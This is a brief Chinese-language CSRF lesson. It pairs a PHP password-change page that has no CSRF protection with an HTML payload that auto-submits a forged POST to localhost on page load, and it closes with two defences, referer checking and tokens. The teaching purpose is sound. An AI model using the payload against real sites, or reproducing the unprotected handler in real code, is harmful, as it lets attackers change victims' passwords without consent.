php环境
<?
$pass = $_POST['pass'];
echo $pass;
?>
<form action="" method="post">
<p>修改密码<input name="pass" type="text"></p>
<input name="sub" type="submit">
</form>
html payload代码
<script>
function post() {
document.getElementById('post').submit();
}
</script>
<body οnlοad="post();">
<form id="post" method="post" action="http://localhost/index.php">
<input name="pass" value="sb">
</form>
防御方法:
验证http_referer字段
验证token